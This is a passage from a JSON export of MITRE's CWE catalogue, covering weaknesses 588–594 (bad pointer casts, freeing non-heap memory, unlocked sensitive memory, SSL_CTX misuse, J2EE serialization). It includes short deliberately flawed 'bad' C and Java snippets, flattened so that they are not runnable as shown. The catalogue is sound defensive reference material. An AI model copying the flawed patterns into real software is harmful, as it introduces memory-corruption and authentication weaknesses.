Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2006-12-15"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Description, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Common_Consequences, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Common_Consequences, Weakness_Ordinalities"}]}},"588":{"attr":{"@_ID":"588","@_Name":"Attempt to Access Child of a Non-structure Pointer","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Casting a non-structure type to a structure type and accessing a field can lead to memory access errors or data corruption.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"704","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"758","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Memory","Note":"Adjacent variables in memory may be corrupted by assignments performed on fields after the cast."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"Execution may end due to a memory access error."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"The choice could be made to use a language that is not susceptible to these issues."},{"Phase":"Implementation","Description":"Review of type casting operations can identify locations where incompatible types are cast."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"struct foo{}...int main(int argc, char **argv){}","xhtml:br":["","","",""],"xhtml:div":[{"#text":"int i;","attr":{"@_style":"margin-left:10px;"}},{"#text":"*foo = (struct foo *)main;foo-&gt;i = 2;return foo-&gt;i;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}]}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP7","Entry_Name":"Faulty Pointer Use"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples"}]}},"589":{"attr":{"@_ID":"589","@_Name":"Call to Non-ubiquitous API","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses an API function that does not exist on all versions of the target platform. This could cause portability problems or inconsistencies that allow denial of service or other consequences.","Extended_Description":"Some functions that offer security features supported by the OS are not available on all versions of the OS in common use. Likewise, functions are often deprecated or made obsolete for security reasons and should not be used.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"474","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Always test your code on any platform on which it is targeted to run on."},{"Phase":"Testing","Description":"Test your code on the newest and oldest platform on which it is targeted to run on."},{"Phase":"Testing","Description":"Develop a system to test for API functions that are not portable."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MET02-J","Entry_Name":"Do not use deprecated or obsolete classes or methods"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SER00-J","Entry_Name":"Maintain serialization compatibility during class evolution"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"96"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2006-12-15"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Call to Limited API","attr":{"@_Date":"2008-04-11"}}}},"590":{"attr":{"@_ID":"590","@_Name":"Free of Memory not on the Heap","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application calls free() on a pointer to memory that was not allocated using associated heap allocation functions such as malloc(), calloc(), or realloc().","Extended_Description":"When free() is called on an invalid pointer, the program\'s memory management data structures may become corrupted. This corruption can cause the program to crash or, in some circumstances, an attacker may be able to cause free() to operate on controllable memory locations to modify critical program variables or execute code.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"762","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"123","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Execute Unauthorized Code or Commands","Modify Memory"],"Note":"There is the potential for arbitrary code execution with privileges of the vulnerable program via a \\"write, what where\\" primitive. If pointers to memory which hold user information are freed, a malicious user will be able to write 4 bytes anywhere in memory."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Only free pointers that you have called malloc on previously. This is the recommended solution. Keep track of which pointers point at the beginning of valid chunks and free them only once."},{"Phase":"Implementation","Description":"Before freeing a pointer, the programmer should make sure that the pointer was previously allocated on the heap and that the memory belongs to the programmer. Freeing an unallocated pointer will cause undefined behavior in the program."},{"attr":{"@_Mitigation_ID":"MIT-4.6"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, glibc in Linux provides protection against free of invalid pointers."]}},{"Phase":"Architecture and Design","Description":"Use a language that provides abstractions for memory allocation and deallocation."},{"Phase":"Testing","Description":"Use a tool that dynamically detects memory management problems, such as valgrind."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In this example, an array of record_t structs, bar, is allocated automatically on the stack as a local variable and the programmer attempts to call free() on the array. The consequences will vary based on the implementation of free(), but it will not succeed in deallocating the memory.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void foo(){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"record_t bar[MAX_SIZE];...free(bar);","xhtml:br":["","","","",""],"xhtml:i":"/* do something interesting with bar */"}}}},{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"record_t bar[MAX_SIZE]; //Global varvoid foo(){}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...free(bar);","xhtml:br":["","",""],"xhtml:i":"/* do something interesting with bar */"}}}},{"attr":{"@_Nature":"good"},"xhtml:div":{"#text":"void foo(){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"record_t *bar = (record_t*)malloc(MAX_SIZE*sizeof(record_t));...free(bar);","xhtml:br":["","","","",""],"xhtml:i":"/* do something interesting with bar */"}}}},{"attr":{"@_Nature":"good"},"xhtml:div":{"#text":"record_t *bar; //Global varvoid foo(){}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"bar = (record_t*)malloc(MAX_SIZE*sizeof(record_t));...free(bar);","xhtml:br":["","","","",""],"xhtml:i":"/* do something interesting with bar */"}}}}],"Body_Text":["This example shows the array allocated globally, as part of the data segment of memory and the programmer attempts to call free() on the array.","Instead, if the programmer wanted to dynamically manage the memory, malloc() or calloc() should have been used.","Additionally, you can pass global variables to free() when they are pointers to dynamically allocated memory."]}},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM34-C","Entry_Name":"Only free memory allocated dynamically","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"WIN30-C","Entry_Name":"Properly pair allocation and deallocation functions","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP12","Entry_Name":"Faulty Memory Release"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-480"}}},"Notes":{"Note":{"#text":"In C++, if the new operator was used to allocate the memory, it may be allocated with the malloc(), calloc() or realloc() family of functions in the implementation. Someone aware of this behavior might choose to map this problem to CWE-590 or to its parent, CWE-762, depending on their perspective.","attr":{"@_Type":"Other"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Name, Other_Notes, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes, Other_Notes"}],"Previous_Entry_Name":[{"#text":"Improperly Freeing Heap Memory","attr":{"@_Date":"2008-04-11"}},{"#text":"Free of Invalid Pointer Not on the Heap","attr":{"@_Date":"2009-05-27"}},{"#text":"Free of Memory not on the Heap","attr":{"@_Date":"2009-10-29"}}]}},"591":{"attr":{"@_ID":"591","@_Name":"Sensitive Data Storage in Improperly Locked Memory","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application stores sensitive data in memory that is not locked, or that has been incorrectly locked, which might cause the memory to be written to swap files on disk by the virtual memory manager. This can make the data more accessible to external actors.","Extended_Description":"On Windows systems the VirtualLock function can lock a page of memory to ensure that it will remain present in memory and not be swapped to disk. However, on older versions of Windows, such as 95, 98, or Me, the VirtualLock() function is only a stub and provides no protection. On POSIX systems the mlock() call ensures that a page will stay resident in memory but does not guarantee that the page will not appear in the swap. Therefore, it is unsuitable for use as a protection mechanism for sensitive data. Some platforms, in particular Linux, do make the guarantee that the page will not be swapped, but this is non-standard and is not portable. Calls to mlock() also require supervisor privilege. Return values for both of these calls must be checked to ensure that the lock operation was actually successful.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"413","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Application Data","Read Memory"],"Note":"Sensitive data that is written to a swap file may be exposed."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Identify data that needs to be protected from swapping and choose platform-appropriate protection mechanisms."},{"Phase":"Implementation","Description":"Check return values to ensure locking operations are successful."}]},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A8","Entry_Name":"Insecure Storage","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM06-C","Entry_Name":"Ensure that sensitive data is not written out to disk"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Memory Locking","attr":{"@_Date":"2008-04-11"}}}},"592":{"attr":{"@_ID":"592","@_Name":"DEPRECATED: Authentication Bypass Issues","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This weakness has been deprecated because it covered redundant concepts already described in CWE-287.","Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2006-12-15"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Common_Consequences, Description, Name, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type"}],"Previous_Entry_Name":{"#text":"Authentication Bypass Issues","attr":{"@_Date":"2017-05-03"}}}},"593":{"attr":{"@_ID":"593","@_Name":"Authentication Bypass: OpenSSL CTX Object Modified after SSL Objects are Created","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software modifies the SSL context after connection creation has begun.","Extended_Description":"If the program modifies the SSL_CTX object after creating SSL objects from it, there is the possibility that older SSL objects created from the original context could all be affected by that change.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"666","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"No authentication takes place in this process, bypassing an assumed protection of encryption."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"The encrypted communication between a user and a trusted host may be subject to a sniffing attack."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use a language or a library that provides a cryptography framework at a higher level of abstraction."},{"Phase":"Implementation","Description":"Most SSL_CTX functions have SSL counterparts that act on SSL-type objects."},{"Phase":"Implementation","Description":"Applications should set up an SSL_CTX completely, before creating SSL objects from it."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define CERT \\"secret.pem\\"#define CERT2 \\"secret2.pem\\"int main(){}","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"SSL_CTX *ctx;SSL *ssl;init_OpenSSL();seed_prng();ctx = SSL_CTX_new(SSLv23_method());if (SSL_CTX_use_certificate_chain_file(ctx, CERT) != 1)if (SSL_CTX_use_PrivateKey_file(ctx, CERT, SSL_FILETYPE_PEM) != 1)if (!(ssl = SSL_new(ctx)))if ( SSL_CTX_set_default_passwd_cb(ctx, \\"new default password\\" != 1))if (!(ssl2 = SSL_new(ctx)))","xhtml:br":["","","","","","","","","","","","","","",""],"xhtml:div":[{"#text":"int_error(\\"Error loading certificate from file\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"int_error(\\"Error loading private key from file\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"int_error(\\"Error creating an SSL context\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"int_error(\\"Doing something which is dangerous to do anyways\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"int_error(\\"Error creating an SSL context\\");","attr":{"@_style":"margin-left:10px;"}}]}}}}}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"94"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Common_Consequences, Relationships"}]}},"594":{"attr":{"@_ID":"594","@_Name":"J2EE Framework: Saving Unserializable Objects to Disk","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"When the J2EE container attempts to write unserializable objects to disk there is no guarantee that the process will complete successfully.","Extended_Description":"In heavy load conditions, most J2EE application frameworks flush objects to disk to manage memory requirements of incoming requests. For example, session scoped objects, and even application scoped objects, are written to disk when required. While these application frameworks do the real work of writing objects to disk, they do not enforce that those objects be serializable, thus leaving the web application vulnerable to crashes induced by serialization failure. An attacker may be able to mount a denial of service attack by sending enough requests to the server to force the web application to save objects to disk.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Indirect"},{"Ordinality":"Primary"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Application Data","Note":"Data represented by unserializable objects can be corrupted."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"Non-serializability of objects can lead to system crash."}]},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":"All objects that become part of session and application scope must implement the java.io.Serializable interface to ensure serializability of containing objects."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following Java example, a Customer Entity JavaBean provides access to customer information in a database for a business application. The Customer Entity JavaBean is used as a session scoped object to return customer information to a Session EJB.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"@Entitypublic class Customer {}","xhtml:br":["","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private String id;private String firstName;private String lastName;private Address address;public Customer() {}public Customer(String id, String firstName, String lastName) {...}@Idpublic String getCustomerId() {...}public void setCustomerId(String id) {...}public String getFirstName() {...}public void setFirstName(String firstName) {...}public String getLastName() {...}public void setLastName(String lastName) {...}@OneToOne()public Address getAddress() {...}public void setAddress(Address address) {...}","xhtml:br":["","","","","","","","","","","","","","","","","","","","","","","","","",""]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":"public class Customer implements Serializable {...}"}],"Body_Text":"However, the Customer Entity JavaBean is an unserialized object which can cause serialization failure and crash the application when the J2EE container attempts to write the object to the system. Session scoped objects must implement the Serializable interface to ensure that the objects serialize properly."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content 